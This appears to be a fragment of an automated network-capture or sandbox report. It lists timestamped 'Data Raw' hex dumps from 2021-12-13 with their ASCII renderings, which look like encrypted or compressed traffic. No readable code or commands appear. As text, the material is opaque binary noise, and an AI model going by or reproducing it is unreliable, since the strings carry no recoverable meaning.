b3 be a2 75 ea 01 71 c9 a9 95 a1 52 77 d0 14 4b d0
                                                                                              Data Ascii: l%gaZmj_|AcWe;NNqF85{E*|'K<rwY"c*My$?6b1'1f-ycc;OB+&Y7k8wca;[uup;x#:n7@^KM!_tZp:Wizx7?er(uqRwK
                                                                                              2021-12-13 23:57:12 UTC2242INData Raw: fa ca a7 4b b8 50 1d c1 b4 49 ed ab 07 e3 bc 88 fb 50 86 eb 10 3b 24 19 64 8d 3c 4a 3b 85 20 ea 1e 8b f9 e6 db 70 e7 e0 73 a5 f3 e6 a2 2b fc 6f f4 b0 57 69 36 d7 46 aa 1e c1 64 ec 50 7b fb 9b 68 b1 4b 83 31 ec f9 68 55 3c 60 00 4e 7d 2a ab b1 c5 ab 59 42 91 53 6e 81 cf 91 45 3e 81 d9 2e b3 5b 50 cf 8a 12 80 8d 76 5b a1 d3 77 aa 4c f2 ca 6b 71 34 2b f0 7e a6 ff 31 c6 68 89 90 c2 bc 48 ee 68 92 bd d9 d3 23 c0 f5 6d 4a b3 2c b6 32 f0 c8 da c6 bc 76 08 45 61 dc d5 69 55 f9 83 0f 7b 07 80 36 6e 54 3b 64 6e b6 01 a9 87 4d c1 4d f7 0b a6 e1 d3 d5 6a d7 33 4b 63 5f ac 00 61 6e cb fc 1a 7d f0 97 96 8f 57 c2 2f c3 1d 6a 5e 06 61 c4 b8 c0 9a 95 98 5c c4 b0 64 f2 8a b1 fd c8 40 63 94 f0 49 22 64 e0 d8 0e 5d e6 26 3a e8 96 c7 07 34 30 9a 0d 07 5f 10 55 0e 85 e2 ba af
                                                                                              Data Ascii: KPIP;$d<J; ps+oWi6FdP{hK1hU<`N}*YBSnE>.[Pv[wLkq4+~1hHh#mJ,2vEaiU{6nT;dnMMj3Kc_an}W/j^a\d@cI"d]&:40_U
                                                                                              2021-12-13 23:57:12 UTC2243INData Raw: 7e 29 ce 06 55 c4 cb f0 c4 95 37 95 c2 bd a7 5b b6 95 f2 d8 5b 95 fd ca c2 5a 20 48 6e 14 e6 12 81 f9 f7 ee e4 4d fc 56 d7 52 9c 02 5f 39 9e c5 ed 41 5b d0 4a c7 e5 09 5f 3e b7 55 4b 8d 20 30 9b eb 5e f7 5d 8a 5f 44 f1 17 5c 76 69 c9 a1 15 37 18 46 07 1a 3b 65 e1 75 97 f9 eb a5 d7 58 c1 3a 64 29 d1 21 5d a7 3f 52 a8 3f b3 37 e3 43 ec 8c d8 57 dd d7 ec 3c 98 6b cf b1 95 41 92 93 21 c3 99 9e ad d7 bc fc ca 25 cb b0 01 92 33 76 62 4d f5 43 95 0f ad 9b 1d 43 77 f9 04 45 13 b0 f0 96 ca 2f 4e 99 b3 a3 1d 26 e2 4e 89 04 8f 23 12 3f 72 e8 2f e4 63 fa a0 0c e1 9f f0 4f 9b 5f 34 6f e4 78 b5 62 8d fc 0a 91 28 3a 62 e3 1e 2b e5 2a c3 3b ad 44 86 0b 00 dd 30 a8 8e ba 5f 20 61 16 dc 9f b7 18 59 21 66 ab a1 b2 d9 26 19 6f d2 6b 53 16 fd 87 70 a0 17 81 5a 69 97 cd f9 ed
                                                                                              Data Ascii: ~)U7[[Z HnMVR_9A[J_>UK 0^]_D\vi7F;euX:d)!]?R?7CW<kA!%3vbMCCwE/N&N#?r/cO_4oxb(:b+*;D0_ aY!f&okSpZi
                                                                                              2021-12-13 23:57:12 UTC2259INData Raw: 35 92 e0 73 77 0b c4 f8 82 ea 4b 58 02 ae 5f 9a 9d 2d a5 cc da f5 be 7d c0 86 21 35 20 33 29 70 e6 65 77 fe ae 42 e7 5f 6a 8e 07 44 c3 61 f8 f7 7a 6a cc 02 8e e3 da 10 ab bc ee 9b a7 ec 88 7e 69 6f 0d 04 96 db 04 27 93 2a 1c 32 db 8b 5e d8 f0 d6 39 69 de f2 08 4f 29 ed de 8d 3a ca a7 44 31 36 ee af 4b 2a f4 10 49 4a e5 7d bf 20 23 a1 b5 32 39 b9 27 a3 93 26 94 bd 68 ac 4d 08 94 14 f6 d0 de aa 78 57 c8 12 db dc 7c 8f 5d 9d ce 94 da 96 7b b6 31 1f 87 57 e9 7b 3e 36 62 f3 53 5c 50 27 2d 6e 49 44 e5 f0 03 13 51 c7 01 67 8c ae d6 25 96 df e9 50 4d 50 19 b1 fe 9e a0 b1 9f 1a bb 48 35 85 cd 8a fc 34 b6 8c 86 8c ed d8 67 6e 08 21 9b 94 a4 e2 f2 8d 19 21 75 86 a1 c4 96 3e 0e 1c 27 0d 4c a8 56 1e 9b 46 b6 ca 48 84 e0 32 62 65 0e a8 fc 2c 14 26 eb 48 87 3f ea a3 52
                                                                                              Data Ascii: 5swKX_-}!5 3)pewB_jDazj~io'*2^9iO):D16K*IJ} #29'&hMxW|]{1W{>6bS\P'-nIDQg%PMPH54gn!!u>'LVFH2be,&H?R
                                                                                              2021-12-13 23:57:12 UTC2260INData Raw: fa 7b 1f 05 0a a8 cf c2 55 e5 e8 ad ef c0 b2 ae d8 e9 d0 a2 6e cc d4 eb 1d 96 2d c8 07 15 6c dd 18 0c 2e 3f dc 70 00 d5 44 75 49 8f fe 99 0f 30 a5 ae a6 6c df 31 27 42 0e 2c 7b 42 2b da 20 ad d7 77 19 79 0b c3 c1 03 63 fe aa 16 bd 90 c4 10 45 49 98 00 82 c9 f7 1a 0b b7 b7 9e c3 ac 53 c2 c1 83 92 c0 4f 3b 1b 8f 42 21 c5 34 4f d5 62 c9 96 4e 49 66 5c b8 d3 c5 0c ea 77 73 d0 89 63 8b 90 05 6a 87 27 84 c2 5d 29 c1 15 5f de 3c f1 4a be 7f d1 e6 63 6f 88 c8 04 cd 83 75 29 16 07 5c 54 d4 1f f7 fd de 51 56 e3 51 22 7f fa 01 ab 9d a9 6b 06 08 84 39 dc 9f 10 7b f7 b1 a4 e5 48 2e dd d6 c5 e2 20 de f5 eb a7 fc 18 2c 88 43 62 43 03 3d 1a 8f 43 9c 16 3c 35 82 77 05 cc df 8b a1 00 6d 16 bc c6 1d fd 7b e2 d8 38 1f 97 4a 63 cd eb 73 52 3c c7 99 da d4 cc 7c 43 91 c5 ef 01
                                                                                              Data Ascii: {Un-l.?pDuI0l1'B,{B+ wycEISO;B!4ObNIf\wscj'])_<Jcou)\TQVQ"k9{H. ,CbC=C<5wm{8JcsR<|C
                                                                                              2021-12-13 23:57:12 UTC2276INData Raw: bd c9 b2 bd 76 ec 29 e1 5f 69 d1 c7 fc 1f 5d b3 eb d3 c9 5a dd a0 4c 63 15 d4 80 f3 06 ca 34 bb e7 4d 88 fc cb 3d b3 69 68 0e de cc 1c d4 8d c7 63 f1 91 61 24 0d c9 eb a8 61 f8 a3 ed 51 05 61 27 bb a1 68 45 d9 fa a1 d3 84 84 7d bb 3d 89 c3 22 68 0a e6 c2 f6 e0 db c6 bd a4 a6 4e 10 43 eb 73 87 e5 3d f2 de 3d bf ca 83 be 52 f2 1b ab b3 b0 c0 39 a9 11 3b 8c 39 f0 04 fd cd 72 2f f3 b3 1c ec 1d 49 de 07 9e 61 8e ee 7f fd 18 ae dd bc fe ed a2 13 b5 19 de 99 3c 51 25 b4 3c a8 81 6a b3 eb d2 fa 46 a3 bc 02 00 6a 14 41 48 db 4d df 91 f6 34 1a 88 19 18 c5 d8 4a 70 e2 0e c4 48 b6 1d 85 bd 16 b7 8c 97 2e b4 fa 51 f2 7c ec 2a ff b6 06 68 c7 c9 04 7a c4 c4 05 96 9a 32 02 6d 75 cc cf 26 04 c1 5c 48 f6 96 ef 6b c4 7e 3d 75 5a 6d d0 66 8e d1 67 8d d5 86 b9 f2 60 41 06 9a
                                                                                              Data Ascii: v)_i]ZLc4M=ihca$aQa'hE}="hNCs==R9;9r/Ia<Q%<jFjAHM4JpH.Q|*hz2mu&\Hk~=uZmfg`A
                                                                                              2021-12-13 23:57:12 UTC2277INData Raw: 23 3a 88 2b 0e b6 be 0e 0e 6c 8e fc eb c5 4d db 1c 2a 3c d9 6c db 00 db a1 f0 c3 44 89 c0 5f 35 c8 10 15 a9 75 fd f1 88 4d 29 bb 43 80 f8 95 e2 de fa 47 02 95 bc eb f5 1c 88 bc 40 ca a3 c0 86 99 9d f8 34 2f b0 3c 8f 8d 96 5a cd 91 e4 61 9d 4d 81 ca 45 c9 6c e4 47 87 5d 7f 75 2c e0 39 0b eb b7 00 6f e2 4e 44 f9 14 6d 5f 2e 51 79 42 94 ec ee dd 10 b5 10 74 3f 18 85 fc 52 f7 ed 6b 54 49 df ef d6 34 57 bd df 41 33 c5 a7 9a a2 af 17 42 4a f4 ac 6c 65 5f 89 2d 26 59 61 65 27 58 d5 bf 06 f4 e6 5d 91 94 2c 75 cf 68 97 56 e1 3c 98 bf 5c 06 9f 15 93 89 4d 51 78 42 f3 52 04 59 e7 ed e9 4d 8d 48 bf 10 eb c9 96 b5 45 47 75 b1 e2 d1 2e e8 bc ba fa 26 3a 14 2c f4 6d 06 ed 17 8f 2f d7 73 e8 5a 49 7b a0 34 2a 3b dd 98 fa a8 1f c3 57 55 8c 74 c4 90 ff 97 60 8f be 70 95 b7
                                                                                              Data Ascii: #:+lM*<lD_5uM)CG@4/<ZaMElG]u,9oNDm_.QyBt?RkTI4WA3BJle_-&Yae'X],uhV<\MQxBRYMHEGu.&:,m/sZI{4*;WUt`p
                                                                                              2021-12-13 23:57:12 UTC2293INData Raw: ef 5a c9 01 c1 37 94 df f7 3b 6c 1c 67 0e ca 27 93 d4 20 ca b5 cd de 4e b0 23 a7 cd 1a b1 af a5 41 fc fd 13 21 b4 8a 41 ff 79 05 6a f9 5e 6a f7 29 e2 b6 1f 98 df ac 69 3b 92 e5 35 86 56 12 92 09 df 5f 7e 0f bf 25 76 3f 90 07 f1 c4 58 9b 56 f7 24 4b 1d d6 00 90 76 04 2f 88 6c dc a4 88 c8 51 e9 81 6f 5d 11 90 c6 65 70 97 a9 95 a6 52 c4 c8 8a b1 4c 56 d8 25 4e eb f6 62 33 45 52 36 3b 38 04 c5 8e 7d fb 4b 11 07 7a 4a 34 7c 31 6a 5e b4 3b 0d 30 c8 e0 43 ee ad c9 67 92 54 84 d0 87 1c 12 b1 c6 8a 75 00 58 79 52 f7 14 ae 31 52 18 5d 27 7a ca 8f 8c 7f c2 e4 81 b0 c1 88 d5 93 62 65 3c 1b ef 14 82 8b 60 a2 e7 38 65 77 f0 63 6a 98 f8 1e d8 e1 e0 13 7e 3e 90 fb 7e 73 c7 22 c2 64 06 9e 4f a3 76 8f 08 b8 34 83 c5 00 97 b1 e2 31 c2 11 d4 5b 9c 12 78 13 51 42 a3 02 a5 a8
                                                                                              Data Ascii: Z7;lg' N#A!Ayj^j)i;5V_~%v?XV$Kv/lQo]epRLV%Nb3ER6;8}KzJ4|1j^;0CgTuXyR1R]'zbe<`8ewcj~>~s"dOv41[xQB
                                                                                              2021-12-13 23:57:12 UTC2294INData Raw: c9 aa 2e 1a e5 59 c8 29 c8 d4 c6 7b 18 53 ea 6c fe 4d 2b 25 f1 6b c3 55 28 84 99 be 02 d0 ac 6a bf f8 a6 ea ac e5 ce 9c 52 6d 0b f6 05 c3 57 70 61 31 d5 b0 66 fd 9a bc 9d f8 2c a0 94 a9 fa 33 a3 72 57 fc 42 c6 c2 a8 b3 1d c2 25 ef 14 54 9b 1f 21 fa f2 d8 6f 4c 9b 07 53 38 4a 10 1c 9b bc 74 50 11 7d 87 1a a4 51 b1 f1 5c 36 5c 05 10 8c 7c 16 f5 b4 81 ec c0 7f f8 66 f3 0e 98 1f e8 35 d8 f0 93 c1 73 65 a7 25 87 a3 fb 8d e1 2e b1 9d cd 83 40 56 82 89 b4 11 ca 9d 14 33 37 8f 40 33 c0 ad 6e e5 70 97 e6 96 0c ff fc 34 5f e2 4e 6d cb f0 29 98 de d9 4a c9 f3 31 b5 90 5b 44 57 fe 7f 67 fc 20 2d 07 85 77 41 7e 8d 5a d4 bc 90 bd 2f df 0f fa 63 c1 f4 50 da 3f fe e3 77 5b eb 2f c5 2d ac a4 8e c7 70 e1 c3 67 f3 da 41 64 59 7a 9f 24 09 b1 8a 74 ed 11 e6 cc 04 7d 16 bf 93
                                                                                              Data Ascii: .Y){SlM+%kU(jRmWpa1f,3rWB%T!oLS8JtP}Q\6\|f5se%.@V37@3np4_Nm)J1[DWg -wA~Z/cP?w[/-pgAdYz$t}
                                                                                              2021-12-13 23:57:12 UTC2310INData Raw: 67 eb 27 3e 48 d8 68 13 2e 99 fb 19 6e c9 09 b2 13 8c c6 7e a8 81 89 2b e8 5a 14 60 c9 40 46 4a df e8 b2 86 a1 16 03 34 42 79 81 14 ef 12 e9 10 b4 eb de 4a 5b ae 5d 9c e4 43 6f f0 5a 66 19 d1 5c 81 58 ea 26 e3 1a a6 47 40 ec 33 b2 20 8e 78 fb 75 20 49 ba 34 2e 8d 5b d1 f9 74 2a 88 e4 9b 16 42 91 55 a9 41 94 5c 8f e0 f1 49 d6 13 21 1a 49 c1 d9 a4 1f fb 51 9f 71 f9 c0 09 63 08 6f 0d 8c 1e f4 f5 83 31 e3 c6 9a b8 f8 e0 b7 5e 9f 26 8d b0 6d d2 00 59 52 c0 ad ed bd ef 4c ec 9e 15 79 3d 7c 45 0f 53 fa 71 a6 55 22 25 5c 3c cc d1 15 65 12 ac e3 42 71 6a 0e 7f e5 39 fb 8f af 60 0d 6f 14 a9 3a e4 49 98 2d f6 9e 39 91 eb 23 86 3a 1f 9a 82 ee 90 5e e2 56 0b ed a7 fd bc 7b 6c d7 6c 54 ee fe 4f ff 5f 0e 21 a7 5a be 83 79 13 99 0d 16 92 6b ca 49 4c 53 39 82 a7 c1 56 d7
                                                                                              Data Ascii: g'>Hh.n~+Z`@FJ4ByJ[]CoZf\X&G@3 xu I4.[t*BUA\I!IQqco1^&mYRLy=|ESqU"%\<eBqj9`o:I-9#:^V{llTO_!ZykILS9V
                                                                                              2021-12-13 23:57:12 UTC2311INData Raw: fe 15 46 ba 98 d4 ee e9 95 e3 0d 3b cd 3f f6 8c 70 b4 76 be c3 85 39 e0 35 d0 21 22 b9 07 9a 15 7f 0f 78 bc 04 b7 98 3b 4e 01 b5 fa d5 eb db 42 d2 0d c4 60 9d 1d f5 37 75 4d bc cc ea 2b 7c 4a e1 90 5b 8e c6 97 a5 ff 40 de a7 7a 21 9d 81 18 66 f0 f9 39 1b e9 65 4f 39 dd b4 b4 e9 c0 ea 2e a0 2c 18 c7 a3 61 1b b1 15 23 2d 81 8f 3c dc 9a e0 4e e9 37 1a 93 78 bc 79 31 a3 51 24 bd 70 88 7c db 9a dd d7 98 98 ec 11 1c 4e 3e 9a 6d 68 7e 63 a4 c3 e6 7d 2a df ca bc 12 57 ce 4f e4 56 1a d1 cb b3 39 4b 70 38 2b 6b 49 17 c4 dc c7 55 b0 70 b3 49 f4 99 65 15 17 8b 97 76 69 b9 ff f0 c2 9c f5 dc 31 2b 5e 9b 40 f1 3d d8 41 e6 c8 16 03 e3 4e af 33 3d f3 9f 41 92 39 a1 12 aa ff fa 14 50 06 8f a4 16 82 3f f8 da f6 55 ba 21 0c 99 67 23 5f e3 32 d4 e7 63 0a a1 d8 26 36 2e 30 4b
                                                                                              Data Ascii: F;?pv95!"x;NB`7uM+|J[@z!f9eO9.,a#-<N7xy1Q$p|N>mh~c}*WOV9Kp8+kIUpIevi1+^@=AN3=A9P?U!g#_2c&6.0K
                                                                                              2021-12-13 23:57:12 UTC2327INData Raw: c0 d0 22 4d 32 79 0e 7a be fa 51 c8 5a 81 cd 29 ce 31 60 4b 3f 2d 73 05 5a 80 92 28 c3 eb a4 b0 b2 44 0c a2 2b 02 e0 d9 c2 85 60 48 1b 15 89 33 2d 9f 46 47 e7 27 78 68 95 aa 05 aa 61 cc ab a6 88 9f 33 05 84 81 5c 55 3f 3c ff 35 4a ff 3d 41 aa f3 7a fc 78 15 36 11 94 4b 00 3d 72 e0 90 f6 5f 54 91 fe 9f 26 f8 5d 59 7f 28 04 60 04 15 a0 88 1c 90 16 5d c8 48 45 39 e5 a4 ed 16 0a 18 44 3c f0 5b 84 84 1b db be 47 75 30 99 27 72 42 63 f1 bc c2 42 2a 11 ea 84 26 c1 56 c9 50 de 5a f5 a4 29 32 68 7c d5 02 46 65 76 cc e4 a0 82 be bb a4 48 05 6e c9 43 99 7e a7 18 b6 0f ae da ee c2 91 c0 83 7b 1e 31 37 d9 fb 77 cc 44 6b 09 d9 d0 e5 56 5a 06 fc e2 42 ba 6b 32 29 af ab 72 bb 71 ba af 84 11 c2 52 a8 cb ca cd e3 65 9e b8 10 35 0c 5f 63 e4 77 c8 ca e2 f3 21 4a c6 40 b4 40
                                                                                              Data Ascii: "M2yzQZ)1`K?-sZ(D+`H3-FG'xha3\U?<5J=Azx6K=r_T&]Y(`]HE9D<[Gu0'rBcB*&VPZ)2h|FevHnC~{17wDkVZBk2)rqRe5_cw!J@@
                                                                                              2021-12-13 23:57:12 UTC2328INData Raw: 8f 0e 02 eb 3b ae c6 d9 38 41 3d 33 75 c1 46 2c 4d 2e 07 26 3c 4d dc 4b ff 8e 00 a8 58 c3 92 68 49 e4 19 18 0e f9 d9 a9 fb e7 37 86 28 51 96 b6 7d 34 0e d4 6a e1 bb d5 6a b4 68 ee 59 cd bd 35 8b 27 f3 46 f1 fc 09 b0 d9 b4 42 6c 85 10 d3 55 e9 a5 f7 84 7f ca 51 3a 8f 6c 07 26 e4 9d e9 45 43 7e 82 40 61 db 91 ab 06 54 2f f5 90 e1 33 a1 6c 73 97 c2 99 c5 bd 4a 45 3c 22 91 2a b5 79 f6 17 51 ae fa 8e 57 ed 0e a1 e0 6a 6b bd c3 cb 93 58 9c d5 dc bc 6a 8e 87 6a 64 bf 5f 51 c0 e9 61 af 76 ca ef 36 97 b5 b5 ad 7d 10 7b e1 37 9b 0f 69 c7 76 bd f9 28 2e f7 cc b8 2e 5e 03 06 49 8b aa db 42 f4 a2 c7 50 39 95 f4 2a 1d 5a df ab ee b1 9e 86 ed 59 e9 f2 cc 9b ee d8 89 33 5b a0 1c 51 c3 1a 66 f7 a1 81 f4 bf 60 6c c0 bc 42 e7 2b ba 32 80 28 b1 bd b8 08 dc 73 51 f4 6c 11 64
                                                                                              Data Ascii: ;8A=3uF,M.&<MKXhI7(Q}4jjhY5'FBlUQ:l&EC~@aT/3lsJE<"*yQWjkXjjd_Qav6}{7iv(..^IBP9*ZY3[Qf`lB+2(sQld
                                                                                              2021-12-13 23:57:12 UTC2344INData Raw: bc 60 70 f5 d8 1d 35 17 fd ff 4f ad 48 6d b6 ff a2 1a 86 9f 3e d9 b5 7f 12 1e cd 32 1c 77 7c 9c 3f 7d d1 33 d2 8a 02 75 19 eb ae 56 42 17 64 97 ab 03 ef 2d cd 52 2d 28 74 d7 44 fe 68 41 5a d3 9e 18 0b 51 4d 19 53 2b be 4e 6b a9 3c 28 69 5d df 6a 32 9f 50 60 46 d3 bd d0 15 7a 5f c8 8a ec fa dd 5c a2 e6 c2 cc b2 65 1e 69 5b 85 61 14 02 cd 65 41 86 10 c3 d6 69 29 4b 29 f2 08 32 68 59 4c e6 03 21 91 12 1d 92 1a f0 f0 2d 4b cf a8 55 5c 3f 25 10 7c 1b af a6 0c b0 18 86 82 ce 54 9a 6a 85 16 42 cf fd 8a b0 84 57 41 41 d2 37 7d 44 a9 95 a5 75 52 22 a3 32 c2 bf 04 04 53 fc 1c e5 df 59 68 e9 94 7a 4c c3 eb 83 e4 8e 2a de d2 67 5d 55 53 87 86 0d df 20 19 c2 50 78 8c dd 64 95 ba f4 1e 05 20 32 3b 80 14 6d e3 3c a4 c9 f7 6d 39 4e 34 2e 6d 46 7e bc c0 27 95 52 bc 97 7d
                                                                                              Data Ascii: `p5OHm>2w|?}3uVBd-R-(tDhAZQMS+Nk<(i]j2P`Fz_\ei[aeAi)K)2hYL!-KU\?%|TjBWAA7}DuR"2SYhzL*g]US Pxd 2;m<m9N4.mF~'R}
                                                                                              2021-12-13 23:57:12 UTC2345INData Raw: 9e 42 4d 6f 9d d8 8e 73 81 18 cc d2 ec e5 ea 1a 28 d5 13 02 b6 4e 02 ff ac a8 a0 e9 7d 8a 2a 4d d8 12 0f 54 5f c0 36 bd 9d a7 3d 15 14 12 83 b9 f6 1d 39 46 06 11 dd c4 ae 0c c1 78 c0 a7 c7 c9 df b1 ce d8 d8 b7 78 28 1b 8b 20 b5 d8 1f 1d 40 c7 54 4a f1 8e f0 d8 fb a0 59 de 00 98 9d ce e5 81 67 3d 07 e6 89 90 8c 17 9f 5d 64 56 20 14 d6 30 77 49 5c 46 90 88 37 47 10 36 50 2a 39 86 de d2 eb 8d 43 ae 86 27 23 18 86 13 19 a1 5d e5 8b 2c 1b dd 0a 4a 5d 95 62 be 29 53 94 0f 8b e9 c8 f6 18 08 67 9c 4f 77 bb 00 2e 81 52 fd 0a ae 37 4e 7b 4c 78 79 94 b8 ee 0e 57 86 3d b3 b9 15 ba 9e 3d 45 34 46 05 d5 b1 fa bb 96 da 90 38 50 c7 fd e3 da b2 cf c0 7a 0e 9a 78 09 57 d6 9a 40 00 3c a4 d6 60 94 4a 34 93 b1 a9 76 8c 77 32 ba 3b 94 3d 69 0b f8 d5 e4 2d a3 26 45 11 d0 80 f7
                                                                                              Data Ascii: BMos(N}*MT_6=9Fxx( @TJYg=]dV 0wI\F7G6P*9C'#],J]b)SgOw.R7N{LxyW==E4F8PzxW@<`J4vw2;=i-&E
                                                                                              2021-12-13 23:57:12 UTC2361INData Raw: 0d ad 13 fe d7 fe 0f 13 79 f9 e3 c2 89 f2 b6 6f e3 6c d6 ef b2 66 6c c3 c7 b8 e5 9d 67 d6 bf 9e 00 ad a3 e2 c7 03 4e b5 e8 4e 56 c6 68 84 ec e4 d0 6d d1 08 32 62 30 1f 85 a9 f9 80 b8 f6 ae 27 e8 78 46 7e 0d c0 ab d6 5a a0 b4 97 bd 85 11 b0 e8 ed d3 05 c6 30 a2 d8 81 bb 26 67 f3 84 c8 4a 9c 05 eb 49 2d c2 c7 c7 1b 4b 32 ce 42 de 9c 61 cf 2f 9c 8b e8 bb 55 cb 94 95 0a 78 17 2a a6 cc f2 53 01 c0 6c fe b0 bf bb c7 91 94 d4 5e fd 4c f1 14 08 ae 39 7c bf 5f 44 85 3f b7 0c 42 eb 54 c4 a1 39 cd b9 b3 cd 92 bb 5d 18 86 d0 c6 a2 27 9e ba ee 8e ad b5 8e ac 2a bc d5 f8 91 d8 86 4e b7 b4 40 97 7e ca ed 1a 0e a7 96 0d e5 05 2a 0d 8f 9c 8d 04 ba ce 47 eb 0e bb c0 1e 62 1c 64 fe e3 38 c5 ac 80 db 8a 5a 03 58 3e 4f 35 9a c9 73 d7 89 d0 2c 1b 8d 11 ab 6d f1 1c b8 2e f8 f4
                                                                                              Data Ascii: yolflgNNVhm2b0'xF~Z0&gJI-K2Ba/Ux*Sl^L9|_D?BT9]'*N@~*Gbd8ZX>O5s,m.
                                                                                              2021-12-13 23:57:12 UTC2362INData Raw: f6 ff 5a 60 16 35 bc 4c 7a 14 8d 21 e5 53 de 2e 97 1e cd e9 77 5e 04 37 d6 ba 58 2d 57 55 4c 4f 37 ca 65 cf 25 6a d9 64 5f 93 e6 40 af 9d ea ee 2d 7d 4b d6 7a 40 f7 b9 50 b3 69 d9 1c 31 de 2f a8 f1 aa 27 8f d0 a2 37 ef 6b dc 26 e2 e1 76 e7 8e 21 4c cb 86 cc 83 27 02 cb 4d a8 f2 ba 43 77 df ed 6a 0e 54 59 a0 64 e5 29 33 75 d2 fc 7b dc 69 a4 a0 6d 20 f4 8f 9a 4f cf 16 5c 93 40 12 f5 97 fb c7 c3 32 6b b1 88 d7 9d 7e 5e 2c 2a df 1c bb c1 a4 da ff 83 db 27 69 e6 8b 76 4d 79 e5 79 5b 02 ad d0 9f 1d 07 69 ef a9 2e 02 5a a3 5b 7a b1 9c 4c ae df 24 77 13 4d 8f 51 b4 c6 08 3e e2 9d 20 36 ed 82 04 df 61 ea 27 d8 fa 31 2c 3c cd 80 e4 2c e3 42 ed f7 84 38 81 ce ce 75 74 61 4b 0d 48 3b 30 10 d8 99 7e bc 4b 26 53 69 8f 17 92 18 c6 8c 2a fa 41 3a 30 25 ef eb aa 4b 2a 75
                                                                                              Data Ascii: Z`5Lz!S.w^7X-WULO7e%jd_@-}Kz@Pi1/'7k&v!L'MCwjTYd)3u{im O\@2k~^,*'ivMyy[i.Z[zL$wMQ> 6a'1,<,B8utaKH;0~K&Si*A:0%K*u
                                                                                              2021-12-13 23:57:12 UTC2378INData Raw: fc b2 d9 e0 1e d1 c9 5f 07 8d 36 b8 87 4a 65 90 f6 d1 c3 46 e9 18 cb 37 12 ea b5 4a d8 d7 d1 f0 06 dc 13 88 74 55 8e 7a 9d 03 fc ae 38 9f 70 83 35 fa 26 73 6f 16 a0 6c fc f9 30 26 55 93 1b a9 d1 63 b2 81 c3 4f 2b 27 70 fd b2 a6 75 51 ac 10 f4 b8 55 8d 53 d3 8b da ae c1 7c 1c 49 3c d9 7a 06 e0 dd db 08 00 94 b0 08 9c ee 0a e5 9d 59 22 75 07 60 96 17 a2 b6 1b 38 58 26 8d 50 12 30 dd bb 20 9c a3 a1 0a a8 eb 26 e0 df b4 05 b0 cd 43 a4 98 47 f3 0e b9 20 8a 78 6a de fa 51 53 52 97 2f 1a 1a f5 c1 c9 0e d5 a3 ac 15 5b 1d aa cf e7 c2 25 6b 66 6a fa 76 a5 f5 ae 63 50 34 25 b5 46 34 e3 89 71 10 2d 6f a3 e0 58 03 a1 15 5d 2b d0 ce d7 3f 4d c5 dd 8d d2 4a df 0c 6c 6c 2f 67 ca d9 09 b3 26 86 c5 9d 28 de 47 ad 59 0c 65 10 28 39 e0 4b 88 5a 0a b1 a8 d1 06 c1 2c 85 b6 33
                                                                                              Data Ascii: _6JeF7JtUz8p5&sol0&UcO+'puQUS|I<zY"u`8X&P0 &CG xjQSR/[%kfjvcP4%F4q-oX]+?MJll/g&(GYe(9KZ,3
                                                                                              2021-12-13 23:57:12 UTC2379INData Raw: 88 e4 ae fa d8 ae c9 20 09 e5 f4 a0 f5 7d 3d b2 32 63 14 5f 86 8d f6 fa 75 33 b5 e3 89 0e 0f f8 d7 39 81 07 52 23 62 99 84 55 dd 49 1f 16 e2 1b f4 c4 b9 14 64 11 42 13 7c 74 00 da 2e 47 87 ef bb 8e 40 8c aa 5e ab 43 4b fc 33 49 45 fb fd e1 a5 84 f9 73 79 f7 90 1b c3 67 16 63 7f 7f 0d a5 97 84 a7 7d bc 3a 83 29 86 ed 34 2f 26 c2 72 df df 29 bf cc b4 ae 40 42 1f 94 a4 d3 30 c4 31 b9 50 dc a2 60 7d dd d3 13 4f c8 39 85 fe 79 e3 f0 ab 84 23 59 11 21 9a ce 09 3e 1d ca 47 4c 30 8c d2 46 ea 28 9e 7e e3 fc 9d 31 70 f2 08 db 0b d8 b3 9c 0a d0 a1 9c eb 98 24 89 fb ba 77 f4 4e 76 c0 c7 11 95 40 86 36 37 94 57 d5 03 57 7d cb 5f c1 32 95 51 36 07 ce ec 7b c9 34 3f 79 7c 32 17 23 2c da f6 07 e5 e1 ec 79 84 66 ef 2b d5 c7 f8 bf ed f2 b8 ed 18 d2 42 26 41 b7 44 43 21 c9
                                                                                              Data Ascii: }=2c_u39R#bUIdB|t.G@^CK3IEsygc}:)4/&r)@B01P`}O9y#Y!>GL0F(~1p$wNv@67WW}_2Q6{4?y|2#,yf+B&ADC!
                                                                                              2021-12-13 23:57:12 UTC2395INData Raw: 3d e6 87 3f c5 8b c0 fc d7 ca ba f2 4e 11 5a f8 36 d1 b6 7a 16 ed 1c ef 92 2e 61 23 8c a7 1b e3 12 da 78 cf 61 a4 82 ac 67 ed d0 cf ec 0a 1e 85 ed c8 1b 57 70 ca ff 10 95 1a 46 f4 a3 b1 34 ad d7 3b 4f c6 4f c2 15 49 1c 6e 12 23 1c 51 66 c4 cb 10 42 0e 0f 86 2f c8 94 53 fc d7 ca 95 00 95 73 a2 4d 60 4e 4b 9d cf b2 79 3d 21 43 9d d2 84 39 f3 92 f2 bf d4 56 e6 5b 0d 39 14 7d f4 cc e4 ed c8 4b b8 de 32 82 6f 26 8c ed 46 ab 40 2b 10 e1 ed de c4 1a 51 5f 8d 41 56 fb 7c 73 23 95 1f aa 68 d8 8b 64 86 7f 75 57 5e 31 fc 7e e8 56 2b 98 17 27 82 c4 e3 3f 6b 61 a3 4e 99 99 82 cd b3 fc 3f c2 5c ba 60 23 0e 54 a7 3c 6d c2 1e a8 db a5 c5 b4 ed de 15 ec 68 f6 ea ce 88 4d 3b e1 68 e4 9b aa 76 20 8b 38 62 d0 e7 30 c6 a5 fe 5d 7c ef 4a df 05 1f 74 51 84 65 23 56 39 de 2d 6b
                                                                                              Data Ascii: =?NZ6z.a#xagWpF4;OOIn#QfB/SsM`NKy=!C9V[9}K2o&F@+Q_AV|s#hduW^1~V+'?kaN?\`#T<mhM;hv 8b0]|JtQe#V9-k
